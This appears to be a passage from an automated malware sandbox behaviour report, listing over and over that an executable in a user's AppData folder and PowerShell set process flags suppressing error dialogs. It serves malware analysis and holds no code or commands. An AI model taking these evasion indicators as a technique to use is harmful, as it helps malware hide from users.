                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sharon38892.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
